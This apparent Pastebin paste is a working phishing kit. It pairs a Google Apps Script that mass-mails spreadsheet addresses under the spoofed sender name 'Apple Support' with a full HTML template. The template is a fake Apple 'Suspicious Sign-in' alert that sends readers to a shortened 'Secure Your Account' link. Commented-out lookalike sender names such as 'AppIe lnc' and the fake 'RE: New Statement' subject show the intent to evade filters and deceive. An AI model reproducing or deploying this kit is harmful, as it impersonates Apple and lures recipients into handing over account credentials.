Advertisement
Guest User

Untitled

a guest
Oct 17th, 2018
68
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 23.27 KB | None | 0 0
  1. // This constant is written in column C for rows for which an email
  2. // has been sent successfully.
  3. var EMAIL_SENT = 'TERKIRIM BOS';
  4.  
  5. /**
  6. * Sends non-duplicate emails with data from the current spreadsheet.
  7. */
  8. function sendEmails2() {
  9. var sheet = SpreadsheetApp.getActiveSheet();
  10. var startRow = 1; // First row of data to process
  11. var numRows = 1500; // Number of rows to process
  12. // Fetch the range of cells A2:B3
  13. var dataRange = sheet.getRange(startRow, 1, numRows, 1010);
  14. // Fetch values for each row in the Range.
  15. var data = dataRange.getValues();
  16. for (var i = 0; i < data.length; ++i) {
  17. var row = data[i];
  18. var bcc = row[0]; // First column
  19. var message = HtmlService.createTemplateFromFile('Index').evaluate().getContent(); // Second column
  20. var emailSent = row[3]; // Third column
  21. //var fromList = ["Apple Support","Apple Services","support@apple.com","AppIe Supports","AppIe Ltd","AppIe lnc"];
  22. var x = Math.floor((Math.random() * 6) + 0);
  23. //var fromName = fromList[x];
  24. //var subjectList = ["RE: [ New Statement ] [ Information Updates October 15, 2018, 7:13 pm ] We have sent notifications the last issues of your account was updated, received on email result - #ID62140","RE: [ New Statement ] [ Information Updates October 15, 2018, 7:13 pm ] We have sent notifications the last issues of your account was updated, received on email result - #ID62140","RE: [ New Statement ] [ Information Updates October 15, 2018, 7:13 pm ] We have sent notifications the last issues of your account was updated, received on email result - #ID62140","RE: [ New Statement ] [ Information Updates October 16, 2018, 7:13 pm ] We have sent notifications the last issues of your account was updated, received on email result - #ID62140"];
  25. if (emailSent != EMAIL_SENT) { // Prevents sending duplicates
  26. var subject = "RE: [ New Statement ] [ Information Updates October 16, 2018, 7:13 pm ] We have sent notifications the last issues of your account was updated, received on email result - #ID62140";
  27. var file = DriveApp.getFileById('1UoizluDreOKDrBKzRCetZTYMh_QoVjxL');
  28. MailApp.sendEmail(bcc, subject, message, {htmlBody: message , name: 'Apple Support'});
  29. sheet.getRange(startRow + i, 5).setValue(EMAIL_SENT);
  30. // Make sure the cell is updated right away in case the script is interrupted
  31. SpreadsheetApp.flush();
  32. }
  33. }
  34. }
  35.  
  36.  
  37. <!doctype html>
  38. <html xmlns="http://www.w3.org/1999/xhtml" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office">
  39. <head>
  40. <!-- NAME: SIMPLE TEXT -->
  41. <!--[if gte mso 15]>
  42. <xml>
  43. <o:OfficeDocumentSettings>
  44. <o:AllowPNG/>
  45. <o:PixelsPerInch>96</o:PixelsPerInch>
  46. </o:OfficeDocumentSettings>
  47. </xml>
  48. <![endif]-->
  49. <meta charset="UTF-8">
  50. <meta http-equiv="X-UA-Compatible" content="IE=edge">
  51. <meta name="viewport" content="width=device-width, initial-scale=1">
  52. <title>*|MC:SUBJECT|*</title>
  53.  
  54. <style type="text/css">
  55. p{
  56. margin:10px 0;
  57. padding:0;
  58. }
  59. table{
  60. border-collapse:collapse;
  61. }
  62. h1,h2,h3,h4,h5,h6{
  63. display:block;
  64. margin:0;
  65. padding:0;
  66. }
  67. img,a img{
  68. border:0;
  69. height:auto;
  70. outline:none;
  71. text-decoration:none;
  72. }
  73. body,#bodyTable,#bodyCell{
  74. height:100%;
  75. margin:0;
  76. padding:0;
  77. width:100%;
  78. }
  79. .mcnPreviewText{
  80. display:none !important;
  81. }
  82. #outlook a{
  83. padding:0;
  84. }
  85. img{
  86. -ms-interpolation-mode:bicubic;
  87. }
  88. table{
  89. mso-table-lspace:0pt;
  90. mso-table-rspace:0pt;
  91. }
  92. .ReadMsgBody{
  93. width:100%;
  94. }
  95. .ExternalClass{
  96. width:100%;
  97. }
  98. p,a,li,td,blockquote{
  99. mso-line-height-rule:exactly;
  100. }
  101. a[href^=tel],a[href^=sms]{
  102. color:inherit;
  103. cursor:default;
  104. text-decoration:none;
  105. }
  106. p,a,li,td,body,table,blockquote{
  107. -ms-text-size-adjust:100%;
  108. -webkit-text-size-adjust:100%;
  109. }
  110. .ExternalClass,.ExternalClass p,.ExternalClass td,.ExternalClass div,.ExternalClass span,.ExternalClass font{
  111. line-height:100%;
  112. }
  113. a[x-apple-data-detectors]{
  114. color:inherit !important;
  115. text-decoration:none !important;
  116. font-size:inherit !important;
  117. font-family:inherit !important;
  118. font-weight:inherit !important;
  119. line-height:inherit !important;
  120. }
  121. #bodyCell{
  122. padding:10px;
  123. }
  124. .templateContainer{
  125. max-width:600px !important;
  126. }
  127. a.mcnButton{
  128. display:block;
  129. }
  130. .mcnImage,.mcnRetinaImage{
  131. vertical-align:bottom;
  132. }
  133. .mcnTextContent{
  134. word-break:break-word;
  135. }
  136. .mcnTextContent img{
  137. height:auto !important;
  138. }
  139. .mcnDividerBlock{
  140. table-layout:fixed !important;
  141. }
  142. /*
  143. @tab Page
  144. @section Background Style
  145. @tip Set the background color and top border for your email. You may want to choose colors that match your company's branding.
  146. */
  147. body,#bodyTable{
  148. /*@editable*/background-color:#FFFFFF;
  149. /*@editable*/background-image:none;
  150. /*@editable*/background-repeat:no-repeat;
  151. /*@editable*/background-position:center;
  152. /*@editable*/background-size:cover;
  153. }
  154. /*
  155. @tab Page
  156. @section Background Style
  157. @tip Set the background color and top border for your email. You may want to choose colors that match your company's branding.
  158. */
  159. #bodyCell{
  160. /*@editable*/border-top:0;
  161. }
  162. /*
  163. @tab Page
  164. @section Email Border
  165. @tip Set the border for your email.
  166. */
  167. .templateContainer{
  168. /*@editable*/border:0;
  169. }
  170. /*
  171. @tab Page
  172. @section Heading 1
  173. @tip Set the styling for all first-level headings in your emails. These should be the largest of your headings.
  174. @style heading 1
  175. */
  176. h1{
  177. /*@editable*/color:#202020;
  178. /*@editable*/font-family:Helvetica;
  179. /*@editable*/font-size:26px;
  180. /*@editable*/font-style:normal;
  181. /*@editable*/font-weight:bold;
  182. /*@editable*/line-height:125%;
  183. /*@editable*/letter-spacing:normal;
  184. /*@editable*/text-align:left;
  185. }
  186. /*
  187. @tab Page
  188. @section Heading 2
  189. @tip Set the styling for all second-level headings in your emails.
  190. @style heading 2
  191. */
  192. h2{
  193. /*@editable*/color:#202020;
  194. /*@editable*/font-family:Helvetica;
  195. /*@editable*/font-size:22px;
  196. /*@editable*/font-style:normal;
  197. /*@editable*/font-weight:bold;
  198. /*@editable*/line-height:125%;
  199. /*@editable*/letter-spacing:normal;
  200. /*@editable*/text-align:left;
  201. }
  202. /*
  203. @tab Page
  204. @section Heading 3
  205. @tip Set the styling for all third-level headings in your emails.
  206. @style heading 3
  207. */
  208. h3{
  209. /*@editable*/color:#202020;
  210. /*@editable*/font-family:Helvetica;
  211. /*@editable*/font-size:20px;
  212. /*@editable*/font-style:normal;
  213. /*@editable*/font-weight:bold;
  214. /*@editable*/line-height:125%;
  215. /*@editable*/letter-spacing:normal;
  216. /*@editable*/text-align:left;
  217. }
  218. /*
  219. @tab Page
  220. @section Heading 4
  221. @tip Set the styling for all fourth-level headings in your emails. These should be the smallest of your headings.
  222. @style heading 4
  223. */
  224. h4{
  225. /*@editable*/color:#202020;
  226. /*@editable*/font-family:Helvetica;
  227. /*@editable*/font-size:18px;
  228. /*@editable*/font-style:normal;
  229. /*@editable*/font-weight:bold;
  230. /*@editable*/line-height:125%;
  231. /*@editable*/letter-spacing:normal;
  232. /*@editable*/text-align:left;
  233. }
  234. /*
  235. @tab Header
  236. @section Header Style
  237. @tip Set the borders for your email's header area.
  238. */
  239. #templateHeader{
  240. /*@editable*/border-top:0;
  241. /*@editable*/border-bottom:0;
  242. }
  243. /*
  244. @tab Header
  245. @section Header Text
  246. @tip Set the styling for your email's header text. Choose a size and color that is easy to read.
  247. */
  248. #templateHeader .mcnTextContent,#templateHeader .mcnTextContent p{
  249. /*@editable*/color:#202020;
  250. /*@editable*/font-family:Helvetica;
  251. /*@editable*/font-size:16px;
  252. /*@editable*/line-height:150%;
  253. /*@editable*/text-align:left;
  254. }
  255. /*
  256. @tab Header
  257. @section Header Link
  258. @tip Set the styling for your email's header links. Choose a color that helps them stand out from your text.
  259. */
  260. #templateHeader .mcnTextContent a,#templateHeader .mcnTextContent p a{
  261. /*@editable*/color:#2BAADF;
  262. /*@editable*/font-weight:normal;
  263. /*@editable*/text-decoration:underline;
  264. }
  265. /*
  266. @tab Body
  267. @section Body Style
  268. @tip Set the borders for your email's body area.
  269. */
  270. #templateBody{
  271. /*@editable*/border-top:0;
  272. /*@editable*/border-bottom:0;
  273. }
  274. /*
  275. @tab Body
  276. @section Body Text
  277. @tip Set the styling for your email's body text. Choose a size and color that is easy to read.
  278. */
  279. #templateBody .mcnTextContent,#templateBody .mcnTextContent p{
  280. /*@editable*/color:#202020;
  281. /*@editable*/font-family:Helvetica;
  282. /*@editable*/font-size:16px;
  283. /*@editable*/line-height:150%;
  284. /*@editable*/text-align:left;
  285. }
  286. /*
  287. @tab Body
  288. @section Body Link
  289. @tip Set the styling for your email's body links. Choose a color that helps them stand out from your text.
  290. */
  291. #templateBody .mcnTextContent a,#templateBody .mcnTextContent p a{
  292. /*@editable*/color:#2BAADF;
  293. /*@editable*/font-weight:normal;
  294. /*@editable*/text-decoration:underline;
  295. }
  296. /*
  297. @tab Footer
  298. @section Footer Style
  299. @tip Set the borders for your email's footer area.
  300. */
  301. #templateFooter{
  302. /*@editable*/border-top:0;
  303. /*@editable*/border-bottom:0;
  304. }
  305. /*
  306. @tab Footer
  307. @section Footer Text
  308. @tip Set the styling for your email's footer text. Choose a size and color that is easy to read.
  309. */
  310. #templateFooter .mcnTextContent,#templateFooter .mcnTextContent p{
  311. /*@editable*/color:#202020;
  312. /*@editable*/font-family:Helvetica;
  313. /*@editable*/font-size:12px;
  314. /*@editable*/line-height:150%;
  315. /*@editable*/text-align:left;
  316. }
  317. /*
  318. @tab Footer
  319. @section Footer Link
  320. @tip Set the styling for your email's footer links. Choose a color that helps them stand out from your text.
  321. */
  322. #templateFooter .mcnTextContent a,#templateFooter .mcnTextContent p a{
  323. /*@editable*/color:#202020;
  324. /*@editable*/font-weight:normal;
  325. /*@editable*/text-decoration:underline;
  326. }
  327. @media only screen and (min-width:768px){
  328. .templateContainer{
  329. width:600px !important;
  330. }
  331.  
  332. } @media only screen and (max-width: 480px){
  333. body,table,td,p,a,li,blockquote{
  334. -webkit-text-size-adjust:none !important;
  335. }
  336.  
  337. } @media only screen and (max-width: 480px){
  338. body{
  339. width:100% !important;
  340. min-width:100% !important;
  341. }
  342.  
  343. } @media only screen and (max-width: 480px){
  344. #bodyCell{
  345. padding-top:10px !important;
  346. }
  347.  
  348. } @media only screen and (max-width: 480px){
  349. .mcnRetinaImage{
  350. max-width:100% !important;
  351. }
  352.  
  353. } @media only screen and (max-width: 480px){
  354. .mcnImage{
  355. width:100% !important;
  356. }
  357.  
  358. } @media only screen and (max-width: 480px){
  359. .mcnCartContainer,.mcnCaptionTopContent,.mcnRecContentContainer,.mcnCaptionBottomContent,.mcnTextContentContainer,.mcnBoxedTextContentContainer,.mcnImageGroupContentContainer,.mcnCaptionLeftTextContentContainer,.mcnCaptionRightTextContentContainer,.mcnCaptionLeftImageContentContainer,.mcnCaptionRightImageContentContainer,.mcnImageCardLeftTextContentContainer,.mcnImageCardRightTextContentContainer,.mcnImageCardLeftImageContentContainer,.mcnImageCardRightImageContentContainer{
  360. max-width:100% !important;
  361. width:100% !important;
  362. }
  363.  
  364. } @media only screen and (max-width: 480px){
  365. .mcnBoxedTextContentContainer{
  366. min-width:100% !important;
  367. }
  368.  
  369. } @media only screen and (max-width: 480px){
  370. .mcnImageGroupContent{
  371. padding:9px !important;
  372. }
  373.  
  374. } @media only screen and (max-width: 480px){
  375. .mcnCaptionLeftContentOuter .mcnTextContent,.mcnCaptionRightContentOuter .mcnTextContent{
  376. padding-top:9px !important;
  377. }
  378.  
  379. } @media only screen and (max-width: 480px){
  380. .mcnImageCardTopImageContent,.mcnCaptionBottomContent:last-child .mcnCaptionBottomImageContent,.mcnCaptionBlockInner .mcnCaptionTopContent:last-child .mcnTextContent{
  381. padding-top:18px !important;
  382. }
  383.  
  384. } @media only screen and (max-width: 480px){
  385. .mcnImageCardBottomImageContent{
  386. padding-bottom:9px !important;
  387. }
  388.  
  389. } @media only screen and (max-width: 480px){
  390. .mcnImageGroupBlockInner{
  391. padding-top:0 !important;
  392. padding-bottom:0 !important;
  393. }
  394.  
  395. } @media only screen and (max-width: 480px){
  396. .mcnImageGroupBlockOuter{
  397. padding-top:9px !important;
  398. padding-bottom:9px !important;
  399. }
  400.  
  401. } @media only screen and (max-width: 480px){
  402. .mcnTextContent,.mcnBoxedTextContentColumn{
  403. padding-right:18px !important;
  404. padding-left:18px !important;
  405. }
  406.  
  407. } @media only screen and (max-width: 480px){
  408. .mcnImageCardLeftImageContent,.mcnImageCardRightImageContent{
  409. padding-right:18px !important;
  410. padding-bottom:0 !important;
  411. padding-left:18px !important;
  412. }
  413.  
  414. } @media only screen and (max-width: 480px){
  415. .mcpreview-image-uploader{
  416. display:none !important;
  417. width:100% !important;
  418. }
  419.  
  420. } @media only screen and (max-width: 480px){
  421. /*
  422. @tab Mobile Styles
  423. @section Heading 1
  424. @tip Make the first-level headings larger in size for better readability on small screens.
  425. */
  426. h1{
  427. /*@editable*/font-size:22px !important;
  428. /*@editable*/line-height:125% !important;
  429. }
  430.  
  431. } @media only screen and (max-width: 480px){
  432. /*
  433. @tab Mobile Styles
  434. @section Heading 2
  435. @tip Make the second-level headings larger in size for better readability on small screens.
  436. */
  437. h2{
  438. /*@editable*/font-size:20px !important;
  439. /*@editable*/line-height:125% !important;
  440. }
  441.  
  442. } @media only screen and (max-width: 480px){
  443. /*
  444. @tab Mobile Styles
  445. @section Heading 3
  446. @tip Make the third-level headings larger in size for better readability on small screens.
  447. */
  448. h3{
  449. /*@editable*/font-size:18px !important;
  450. /*@editable*/line-height:125% !important;
  451. }
  452.  
  453. } @media only screen and (max-width: 480px){
  454. /*
  455. @tab Mobile Styles
  456. @section Heading 4
  457. @tip Make the fourth-level headings larger in size for better readability on small screens.
  458. */
  459. h4{
  460. /*@editable*/font-size:16px !important;
  461. /*@editable*/line-height:150% !important;
  462. }
  463.  
  464. } @media only screen and (max-width: 480px){
  465. /*
  466. @tab Mobile Styles
  467. @section Boxed Text
  468. @tip Make the boxed text larger in size for better readability on small screens. We recommend a font size of at least 16px.
  469. */
  470. table.mcnBoxedTextContentContainer td.mcnTextContent,td.mcnBoxedTextContentContainer td.mcnTextContent p{
  471. /*@editable*/font-size:14px !important;
  472. /*@editable*/line-height:150% !important;
  473. }
  474.  
  475. } @media only screen and (max-width: 480px){
  476. /*
  477. @tab Mobile Styles
  478. @section Header Text
  479. @tip Make the header text larger in size for better readability on small screens.
  480. */
  481. td#templateHeader td.mcnTextContent,td#templateHeader td.mcnTextContent p{
  482. /*@editable*/font-size:16px !important;
  483. /*@editable*/line-height:150% !important;
  484. }
  485.  
  486. } @media only screen and (max-width: 480px){
  487. /*
  488. @tab Mobile Styles
  489. @section Body Text
  490. @tip Make the body text larger in size for better readability on small screens. We recommend a font size of at least 16px.
  491. */
  492. td#templateBody td.mcnTextContent,td#templateBody td.mcnTextContent p{
  493. /*@editable*/font-size:16px !important;
  494. /*@editable*/line-height:150% !important;
  495. }
  496.  
  497. } @media only screen and (max-width: 480px){
  498. /*
  499. @tab Mobile Styles
  500. @section Footer Text
  501. @tip Make the footer content text larger in size for better readability on small screens.
  502. */
  503. td#templateFooter td.mcnTextContent,td#templateFooter td.mcnTextContent p{
  504. /*@editable*/font-size:14px !important;
  505. /*@editable*/line-height:150% !important;
  506. }
  507.  
  508. }</style></head>
  509. <body>
  510. <!--*|IF:MC_PREVIEW_TEXT|*-->
  511. <!--[if !gte mso 9]><!----><span class="mcnPreviewText" style="display:none; font-size:0px; line-height:0px; max-height:0px; max-width:0px; opacity:0; overflow:hidden; visibility:hidden; mso-hide:all;">[ CASE ID: 15848896 ]</span><!--<![endif]-->
  512. <!--*|END:IF|*-->
  513. <center>
  514. <table align="center" border="0" cellpadding="0" cellspacing="0" height="100%" width="100%" id="bodyTable">
  515. <tr>
  516. <td align="left" valign="top" id="bodyCell">
  517. <!-- BEGIN TEMPLATE // -->
  518. <!--[if (gte mso 9)|(IE)]>
  519. <table align="center" border="0" cellspacing="0" cellpadding="0" width="600" style="width:600px;">
  520. <tr>
  521. <td align="center" valign="top" width="600" style="width:600px;">
  522. <![endif]-->
  523. <table border="0" cellpadding="0" cellspacing="0" width="100%" class="templateContainer">
  524. <tr>
  525. <td valign="top" id="templateHeader"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnImageBlock" style="min-width:100%;">
  526. <tbody class="mcnImageBlockOuter">
  527. <tr>
  528. <td valign="top" style="padding:9px" class="mcnImageBlockInner">
  529. <table align="left" width="100%" border="0" cellpadding="0" cellspacing="0" class="mcnImageContentContainer" style="min-width:100%;">
  530. <tbody><tr>
  531. <td class="mcnImageContent" valign="top" style="padding-right: 9px; padding-left: 9px; padding-top: 0; padding-bottom: 0; text-align:center;">
  532.  
  533.  
  534. <img align="center" alt="" src="https://gallery.mailchimp.com/5f984ee88bcb441fdd4960cd3/images/54a0c3b9-e633-438f-8069-bccda49f9f1c.png" width="35" style="max-width:35px; padding-bottom: 0; display: inline !important; vertical-align: bottom;" class="mcnImage">
  535.  
  536.  
  537. </td>
  538. </tr>
  539. </tbody></table>
  540. </td>
  541. </tr>
  542. </tbody>
  543. </table></td>
  544. </tr>
  545. <tr>
  546. <td valign="top" id="templateBody"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
  547. <tbody class="mcnTextBlockOuter">
  548. <tr>
  549. <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
  550. <!--[if mso]>
  551. <table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
  552. <tr>
  553. <![endif]-->
  554.  
  555. <!--[if mso]>
  556. <td valign="top" width="600" style="width:600px;">
  557. <![endif]-->
  558. <table align="left" border="0" cellpadding="0" cellspacing="0" style="max-width:100%; min-width:100%;" width="100%" class="mcnTextContentContainer">
  559. <tbody><tr>
  560.  
  561. <td valign="top" class="mcnTextContent" style="padding-top:0; padding-right:18px; padding-bottom:9px; padding-left:18px;">
  562.  
  563. <div style="text-align: center;"><span style="font-size:24px">Alert Suspicious Sign-in</span></div>
  564.  
  565. </td>
  566. </tr>
  567. </tbody></table>
  568. <!--[if mso]>
  569. </td>
  570. <![endif]-->
  571.  
  572. <!--[if mso]>
  573. </tr>
  574. </table>
  575. <![endif]-->
  576. </td>
  577. </tr>
  578. </tbody>
  579. </table><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
  580. <tbody class="mcnTextBlockOuter">
  581. <tr>
  582. <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
  583. <!--[if mso]>
  584. <table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
  585. <tr>
  586. <![endif]-->
  587.  
  588. <!--[if mso]>
  589. <td valign="top" width="600" style="width:600px;">
  590. <![endif]-->
  591. <table align="left" border="0" cellpadding="0" cellspacing="0" style="max-width:100%; min-width:100%;" width="100%" class="mcnTextContentContainer">
  592. <tbody><tr>
  593.  
  594. <td valign="top" class="mcnTextContent" style="padding: 0px 18px 9px; line-height: 125%;">
  595.  
  596. <span style="font-size:12px"><span style="font-family:arial,helvetica neue,helvetica,sans-serif">Hello,<br>
  597. Based on our record your recent sign-in was different from your usual location.We suggest<br>
  598. you secure the account to prevent any misuse of your private information. The sign-in detail are:<br>
  599. <br>
  600. Country/region: Sweden<br>
  601. IP address: 195.181.166.131<br>
  602. Date: 16 Oct, 2018<br>
  603. Platform: Windows<br>
  604. Browser: Chrome<br>
  605. <br>
  606. <strong>Don't recognize this activity?</strong><br>
  607. For more information on how to secure your account, please&nbsp;follow the instruction&nbsp; :<br>
  608. <br>
  609. <a href="https://mysp.ac/4Gprh" target="_blank">Secure Your Account</a></span></span><br>
  610. <br>
  611. <span style="font-size:12px"><em>Apple Care Team</em></span>
  612. </td>
  613. </tr>
  614. </tbody></table>
  615. <!--[if mso]>
  616. </td>
  617. <![endif]-->
  618.  
  619. <!--[if mso]>
  620. </tr>
  621. </table>
  622. <![endif]-->
  623. </td>
  624. </tr>
  625. </tbody>
  626. </table></td>
  627. </tr>
  628. <tr>
  629. <td valign="top" id="templateFooter"><table border="0" cellpadding="0" cellspacing="0" width="100%" class="mcnTextBlock" style="min-width:100%;">
  630. <tbody class="mcnTextBlockOuter">
  631. <tr>
  632. <td valign="top" class="mcnTextBlockInner" style="padding-top:9px;">
  633. <!--[if mso]>
  634. <table align="left" border="0" cellspacing="0" cellpadding="0" width="100%" style="width:100%;">
  635. <tr>
  636. <![endif]-->
  637.  
  638. <!--[if mso]>
  639. <td valign="top" width="600" style="width:600px;">
  640. <![endif]-->
  641. <table align="left" border="0" cellpadding="0" cellspacing="0" style="max-width:100%; min-width:100%;" width="100%" class="mcnTextContentContainer">
  642. <tbody><tr>
  643.  
  644. <td valign="top" class="mcnTextContent" style="padding-top:0; padding-right:18px; padding-bottom:9px; padding-left:18px;">
  645.  
  646. <div style="text-align: center;"><span style="font-family:arial,helvetica neue,helvetica,sans-serif"><span style="font-size:12px">Copyright © 2018 Apple Inc.<br>
  647. <a href="https://xp.apple.com/report/2/its_mail_sf?responseType=redirect&amp;emailType=invoice&amp;lang=en_us&amp;eventType=linkClick&amp;redirectUrl=https%3A%2F%2Fwww.apple.com%2Flegal%2F">All rights reserved</a>&nbsp;<br>
  648. 1 Infinite Loop, Cupertino, CA 95014, United States VAT Reg. No. 8675309</span></span></div>
  649.  
  650. </td>
  651. </tr>
  652. </tbody></table>
  653. <!--[if mso]>
  654. </td>
  655. <![endif]-->
  656.  
  657. <!--[if mso]>
  658. </tr>
  659. </table>
  660. <![endif]-->
  661. </td>
  662. </tr>
  663. </tbody>
  664. </table></td>
  665. </tr>
  666. </table>
  667. <!--[if (gte mso 9)|(IE)]>
  668. </td>
  669. </tr>
  670. </table>
  671. <![endif]-->
  672. <!-- // END TEMPLATE -->
  673. </td>
  674. </tr>
  675. </table>
  676. </center>
  677. </body>
  678. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement